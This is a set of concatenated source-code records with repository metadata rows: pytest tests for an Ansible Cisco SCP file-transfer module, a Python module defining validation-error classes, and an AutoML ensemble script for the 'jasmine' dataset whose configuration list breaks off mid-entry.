| 47.423025 | 231 | 0.573719 | 4,351 | 35,425 | 4.386808 | 0.036313 | 0.150259 | 0.066223 | 0.038036 | 0.897941 | 0.873265 | 0.842825 | 0.82082 | 0.796092 | 0.777859 | 0 | 0.010528 | 0.337699 | 35,425 | 746 | 232 | 47.486595 | 0.803001 | 0.053747 | 0 | 0.763113 | 0 | 0 | 0.004869 | 0 | 0 | 0 | 0 | 0.00134 | 0.001692 | 1 | 0.033841 | false | 0 | 0.00846 | 0.003384 | 0.091371 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9e0dfbab527453981816f7ea52313bc56bccd5db | 3,223 | py | Python | tests/test_cisco_file_transfer.py | ktbyers/netsidecar | 993ea9a4d1cb1562f833b50533d5b2284fe68773 | [
"Apache-2.0"
] | 30 | 2015-05-27T22:22:57.000Z | 2021-07-15T18:12:32.000Z | tests/test_cisco_file_transfer.py | ktbyers/scp_sidecar | 993ea9a4d1cb1562f833b50533d5b2284fe68773 | [
"Apache-2.0"
] | 10 | 2015-05-26T01:04:09.000Z | 2021-04-06T17:26:06.000Z | tests/test_cisco_file_transfer.py | ktbyers/netsidecar | 993ea9a4d1cb1562f833b50533d5b2284fe68773 | [
"Apache-2.0"
] | 16 | 2015-05-28T15:47:13.000Z | 2020-11-30T10:07:36.000Z | from DEVICE_CREDS import my_device
def test_setup_initial_state(ansible_module):
    """Push the baseline file to the remote device before the other tests."""
    module_args = {
        "source_file": "/home/kbyers/scp_sidecar/tests/cisco_logging.txt",
        "dest_file": "cisco_logging.txt",
        "enable_scp": "true",
    }
    module_args.update(my_device)
    ansible_module.cisco_file_transfer(**module_args)
def test_file_already_exists(ansible_module):
    """A file already present with the right MD5 must not report 'changed'."""
    module_args = {
        "source_file": "/home/kbyers/scp_sidecar/tests/cisco_logging.txt",
        "dest_file": "cisco_logging.txt",
    }
    module_args.update(my_device)
    output = ansible_module.cisco_file_transfer(**module_args)
    for _host, result in output.items():
        assert result['changed'] is False
        assert result['msg'] == 'File exists and has correct MD5'
def test_xfer_file(ansible_module):
    """Transferring a new file must report a change."""
    # scp is disabled again after this test run.
    module_args = {
        "source_file": "/home/kbyers/scp_sidecar/tests/cisco_logging1.txt",
        "dest_file": "cisco_logging.txt",
        "enable_scp": "true",
    }
    module_args.update(my_device)
    output = ansible_module.cisco_file_transfer(**module_args)
    for _host, result in output.items():
        assert result['changed'] is True
        assert result['msg'] == 'File successfully transferred to remote device'
def test_verify_file(ansible_module):
    """The file transferred by the previous test must verify as unchanged."""
    module_args = {
        "source_file": "/home/kbyers/scp_sidecar/tests/cisco_logging1.txt",
        "dest_file": "cisco_logging.txt",
    }
    module_args.update(my_device)
    output = ansible_module.cisco_file_transfer(**module_args)
    for _host, result in output.items():
        assert result['changed'] is False
        assert result['msg'] == 'File exists and has correct MD5'
def test_xfer_and_scp_enable(ansible_module):
    """Transfer a new file; the module itself must enable scp first."""
    module_args = {
        "source_file": "/home/kbyers/scp_sidecar/tests/cisco_logging.txt",
        "dest_file": "cisco_logging.txt",
        "enable_scp": "true",
    }
    module_args.update(my_device)
    output = ansible_module.cisco_file_transfer(**module_args)
    for _host, result in output.items():
        assert result['changed'] is True
        assert result['msg'] == 'File successfully transferred to remote device'
def test_overwrite(ansible_module):
    """With overwrite disabled, an existing file must not be replaced."""
    module_args = {
        "source_file": "/home/kbyers/scp_sidecar/tests/cisco_logging1.txt",
        "dest_file": "cisco_logging.txt",
        "enable_scp": "true",
        "overwrite": "false",
    }
    module_args.update(my_device)
    output = ansible_module.cisco_file_transfer(**module_args)
    for _host, result in output.items():
        assert result['changed'] is False
        assert result['msg'] == 'File already exists and overwrite set to false'
| 31.910891 | 80 | 0.678871 | 420 | 3,223 | 4.947619 | 0.171429 | 0.095284 | 0.064966 | 0.060635 | 0.804139 | 0.804139 | 0.804139 | 0.804139 | 0.804139 | 0.804139 | 0 | 0.00199 | 0.220602 | 3,223 | 100 | 81 | 32.23 | 0.825239 | 0.108284 | 0 | 0.761905 | 0 | 0 | 0.238935 | 0.104714 | 0 | 0 | 0 | 0 | 0.15873 | 1 | 0.095238 | false | 0 | 0.015873 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9e19481a71bce970e44ad2d8aa2050276bf9bd71 | 8,473 | py | Python | valera/errors/__init__.py | nikitanovosibirsk/valera | f2111f5b886fe58f6f8054c20de35102c4518114 | [
"Apache-2.0"
] | null | null | null | valera/errors/__init__.py | nikitanovosibirsk/valera | f2111f5b886fe58f6f8054c20de35102c4518114 | [
"Apache-2.0"
] | 2 | 2021-12-05T11:41:46.000Z | 2022-02-01T15:13:19.000Z | valera/errors/__init__.py | nikitanovosibirsk/valera | f2111f5b886fe58f6f8054c20de35102c4518114 | [
"Apache-2.0"
] | null | null | null | from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, Any, Tuple, Type
from district42 import GenericSchema
from th import PathHolder
if TYPE_CHECKING:
from .._formatter import Formatter
# Public API of this module: the abstract base class plus every concrete
# validation-error record, re-exported for ``from valera.errors import *``.
__all__ = ("ValidationError", "TypeValidationError", "ValueValidationError",
"MinValueValidationError", "MaxValueValidationError", "LengthValidationError",
"MinLengthValidationError", "MaxLengthValidationError", "AlphabetValidationError",
"SubstrValidationError", "RegexValidationError", "MissingElementValidationError",
"ExtraElementValidationError", "MissingKeyValidationError", "ExtraKeyValidationError",
"SchemaMismatchValidationError",)
class ValidationError(ABC):
    """Abstract base for all validation-error records.

    Subclasses implement :meth:`format`, which renders the error through a
    formatter.  Two errors compare equal when they share a class and have
    identical attribute dictionaries.
    """

    def __eq__(self, other: Any) -> bool:
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    @abstractmethod
    def format(self, formatter: "Formatter") -> str:
        pass
class TypeValidationError(ValidationError):
    """Carries a value together with the type it was expected to have."""

    def __init__(self, path: PathHolder, actual_value: Any, expected_type: Type[Any]) -> None:
        self.path = path
        self.actual_value = actual_value
        self.expected_type = expected_type

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.expected_type!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_type_error(self)
class ValueValidationError(ValidationError):
    """Carries a value together with the value it was expected to equal."""

    def __init__(self, path: PathHolder, actual_value: Any, expected_value: Any) -> None:
        self.path = path
        self.actual_value = actual_value
        self.expected_value = expected_value

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.expected_value!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_value_error(self)
class MinValueValidationError(ValidationError):
    """Carries a value together with the configured minimum bound."""

    def __init__(self, path: PathHolder, actual_value: Any, min_value: Any) -> None:
        self.path = path
        self.actual_value = actual_value
        self.min_value = min_value

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.min_value!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_min_value_error(self)
class MaxValueValidationError(ValidationError):
    """Carries a value together with the configured maximum bound."""

    def __init__(self, path: PathHolder, actual_value: Any, max_value: Any) -> None:
        self.path = path
        self.actual_value = actual_value
        self.max_value = max_value

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.max_value!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_max_value_error(self)
class LengthValidationError(ValidationError):
    """Carries a value together with the exact expected length."""

    def __init__(self, path: PathHolder, actual_value: Any, length: int) -> None:
        self.path = path
        self.actual_value = actual_value
        self.length = length

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.length!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_length_error(self)
class MinLengthValidationError(ValidationError):
    """Carries a value together with the configured minimum length."""

    def __init__(self, path: PathHolder, actual_value: Any, min_length: int) -> None:
        self.path = path
        self.actual_value = actual_value
        self.min_length = min_length

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.min_length!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_min_length_error(self)
class MaxLengthValidationError(ValidationError):
    """Carries a value together with the configured maximum length."""

    def __init__(self, path: PathHolder, actual_value: Any, max_length: int) -> None:
        self.path = path
        self.actual_value = actual_value
        self.max_length = max_length

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.max_length!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_max_length_error(self)
class AlphabetValidationError(ValidationError):
    """Carries a string together with the allowed alphabet."""

    def __init__(self, path: PathHolder, actual_value: str, alphabet: str) -> None:
        self.path = path
        self.actual_value = actual_value
        self.alphabet = alphabet

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.alphabet!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_alphabet_error(self)
class SubstrValidationError(ValidationError):
    """Carries a value together with the expected substring."""

    def __init__(self, path: PathHolder, actual_value: Any, substr: str) -> None:
        self.path = path
        self.actual_value = actual_value
        self.substr = substr

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.substr!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_substr_error(self)
class RegexValidationError(ValidationError):
    """Carries a value together with the regex pattern it was checked against."""

    def __init__(self, path: PathHolder, actual_value: Any, pattern: str) -> None:
        self.path = path
        self.actual_value = actual_value
        self.pattern = pattern

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.pattern!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_regex_error(self)
class MissingElementValidationError(ValidationError):
    """Carries a container value together with the index of a missing element."""

    def __init__(self, path: PathHolder, actual_value: Any, index: int) -> None:
        self.path = path
        self.actual_value = actual_value
        self.index = index

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.index!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_missing_element_error(self)
class ExtraElementValidationError(ValidationError):
    """Carries a container value together with the index of an extra element."""

    def __init__(self, path: PathHolder, actual_value: Any, index: int) -> None:
        self.path = path
        self.actual_value = actual_value
        self.index = index

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.index!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_extra_element_error(self)
class MissingKeyValidationError(ValidationError):
    """Carries a mapping value together with the key it is missing."""

    def __init__(self, path: PathHolder, actual_value: Any, missing_key: Any) -> None:
        self.path = path
        self.actual_value = actual_value
        self.missing_key = missing_key

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.missing_key!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_missing_key_error(self)
class ExtraKeyValidationError(ValidationError):
    """Carries a mapping value together with an unexpected extra key."""

    def __init__(self, path: PathHolder, actual_value: Any, extra_key: Any) -> None:
        self.path = path
        self.actual_value = actual_value
        self.extra_key = extra_key

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.extra_key!r})"

    def format(self, formatter: "Formatter") -> str:
        return formatter.format_extra_key_error(self)
class SchemaMismatchValidationError(ValidationError):
    """Carries a value together with the candidate schemas it was checked against."""

    def __init__(self, path: PathHolder, actual_value: Any,
                 expected_schemas: Tuple[GenericSchema, ...]) -> None:
        self.path = path
        self.actual_value = actual_value
        self.expected_schemas = expected_schemas

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        return f"{cls_name}({self.path!r}, {self.actual_value!r}, {self.expected_schemas!r})"

    def format(self, formatter: "Formatter") -> str:
        # Note: the formatter hook is spelled "missmatch" upstream; keep it.
        return formatter.format_schema_missmatch_error(self)
| 36.209402 | 97 | 0.666352 | 972 | 8,473 | 5.399177 | 0.074074 | 0.125762 | 0.085747 | 0.067073 | 0.727515 | 0.727515 | 0.721037 | 0.721037 | 0.711319 | 0.60747 | 0 | 0.000299 | 0.211731 | 8,473 | 233 | 98 | 36.364807 | 0.785447 | 0 | 0 | 0.479042 | 0 | 0.011976 | 0.207483 | 0.155317 | 0 | 0 | 0 | 0 | 0 | 1 | 0.281437 | false | 0.005988 | 0.02994 | 0.185629 | 0.592814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
f508a780eb19e7a306a06b6907af989399b783b8 | 21,621 | py | Python | 001_jasmine.py | bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015 | a9acb6906ff141e7c24cff80f92efef7d7c3ff09 | [
"BSD-2-Clause"
] | 1 | 2019-06-12T19:55:35.000Z | 2019-06-12T19:55:35.000Z | 001_jasmine.py | bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015 | a9acb6906ff141e7c24cff80f92efef7d7c3ff09 | [
"BSD-2-Clause"
] | null | null | null | 001_jasmine.py | bigdatamatta/ChaLearn_Automatic_Machine_Learning_Challenge_2015 | a9acb6906ff141e7c24cff80f92efef7d7c3ff09 | [
"BSD-2-Clause"
] | null | null | null | import argparse
import os
import numpy as np
import autosklearn
import autosklearn.data
import autosklearn.data.data_manager
import autosklearn.models.evaluator
from ParamSklearn.classification import ParamSklearnClassifier
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
args = parser.parse_args()
input = args.input
dataset = 'jasmine'
output = args.output
D = autosklearn.data.data_manager.DataManager(dataset, input)
X = D.data['X_train']
y = D.data['Y_train']
X_valid = D.data['X_valid']
X_test = D.data['X_test']
# Subset of features found with RFE. Feature with least importance in sklearn
# RF removed. Afterwards, trained RF on remaining features with 5CV. In the
# end, choose feature set with lowest error
features = [6, 8, 10, 12, 16, 18, 20, 21, 22, 25, 26, 33, 37, 38, 39, 40, 42,
44, 46, 47, 52, 55, 56, 58, 62, 77, 78, 79, 82, 85, 91, 92, 94, 96,
101, 104, 106, 108, 110, 119, 122, 125, 130, 131, 133, 137, 139,
140, 141]
X = X[:, features]
X_valid = X_valid[:, features]
X_test = X_test[:, features]
# Weights of the ensemble members as determined by Ensemble Selection
weights = np.array([0.140000, 0.120000, 0.080000, 0.060000, 0.040000, 0.040000,
0.040000, 0.040000, 0.040000, 0.040000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000, 0.020000, 0.020000,
0.020000, 0.020000, 0.020000, 0.020000])
# Ensemble members found by SMAC
configurations = [
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'True',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.58545644982',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '2.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '39.9235093683',
'select_percentile_classification:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'most_frequent',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '0.6715305958',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '3.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'standard',
'select_rates:alpha': '0.486873466534',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.82773631717',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '3.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '50.0',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '832.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.93148979051',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '5.0',
'random_forest:min_samples_split': '7.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.79654377812',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '6.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '50.0',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'False',
'extra_trees:criterion': 'entropy',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '1.81061189332',
'extra_trees:min_samples_leaf': '1.0',
'extra_trees:min_samples_split': '3.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_rates',
'rescaling:strategy': 'none',
'select_rates:alpha': '0.201722721361',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'False',
'extra_trees:criterion': 'gini',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '1.76442905847',
'extra_trees:min_samples_leaf': '4.0',
'extra_trees:min_samples_split': '6.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.113572172949',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.87832643035',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '19.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.110716868617',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'True',
'extra_trees:criterion': 'entropy',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '3.23138088334',
'extra_trees:min_samples_leaf': '3.0',
'extra_trees:min_samples_split': '6.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_percentile_classification',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '45.1994111355',
'select_percentile_classification:score_func': 'chi2'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '509.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.2727882732',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '12.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_percentile_classification',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.32162402484',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '12.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_percentile_classification:percentile': '41.8671636453',
'select_percentile_classification:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '690.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.3355464987',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'True',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '4.2700093411',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.294021193269',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '613.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.8000767552',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '7.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '661.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.23424202393',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '10.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '606.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.82743208676',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '3.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'True',
'extra_trees:criterion': 'gini',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '4.32850858484',
'extra_trees:min_samples_leaf': '3.0',
'extra_trees:min_samples_split': '5.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'mean',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.118453703147',
'select_rates:mode': 'fpr',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1098.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'most_frequent',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '4.83031750621',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '1.0',
'random_forest:min_samples_split': '15.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'imputation:strategy': 'median',
'preprocessor': 'select_rates',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '3.52038352463',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '4.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'standard',
'select_rates:alpha': '0.441859738474',
'select_rates:mode': 'fpr',
'select_rates:score_func': 'f_classif'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '743.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.37406180812',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '17.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'none',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '531.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'mean',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '2.38993786345',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '4.0',
'random_forest:min_samples_split': '16.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'extra_trees',
'extra_trees:bootstrap': 'False',
'extra_trees:criterion': 'entropy',
'extra_trees:max_depth': 'None',
'extra_trees:max_features': '1.60284209578',
'extra_trees:min_samples_leaf': '4.0',
'extra_trees:min_samples_split': '10.0',
'extra_trees:n_estimators': '100.0',
'imputation:strategy': 'most_frequent',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.486662334462',
'select_rates:mode': 'fwe',
'select_rates:score_func': 'chi2'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '1082.0',
'fast_ica:whiten': 'False',
'imputation:strategy': 'median',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'entropy',
'random_forest:max_depth': 'None',
'random_forest:max_features': '1.47545539014',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '15.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'random_forest',
'fast_ica:algorithm': 'deflation',
'fast_ica:fun': 'logcosh',
'fast_ica:n_components': '985.0',
'fast_ica:whiten': 'True',
'imputation:strategy': 'most_frequent',
'preprocessor': 'fast_ica',
'random_forest:bootstrap': 'False',
'random_forest:criterion': 'gini',
'random_forest:max_depth': 'None',
'random_forest:max_features': '3.87640604363',
'random_forest:max_leaf_nodes': 'None',
'random_forest:min_samples_leaf': '2.0',
'random_forest:min_samples_split': '11.0',
'random_forest:n_estimators': '100.0',
'rescaling:strategy': 'min/max'},
{'balancing:strategy': 'weighting',
'classifier': 'gradient_boosting',
'gradient_boosting:learning_rate': '0.236639577539',
'gradient_boosting:max_depth': '5.0',
'gradient_boosting:max_features': '1.94802938969',
'gradient_boosting:min_samples_leaf': '3.0',
'gradient_boosting:min_samples_split': '4.0',
'gradient_boosting:n_estimators': '100.0',
'gradient_boosting:subsample': '0.499388145134',
'imputation:strategy': 'most_frequent',
'preprocessor': 'select_rates',
'rescaling:strategy': 'min/max',
'select_rates:alpha': '0.078631031495',
'select_rates:mode': 'fwe',
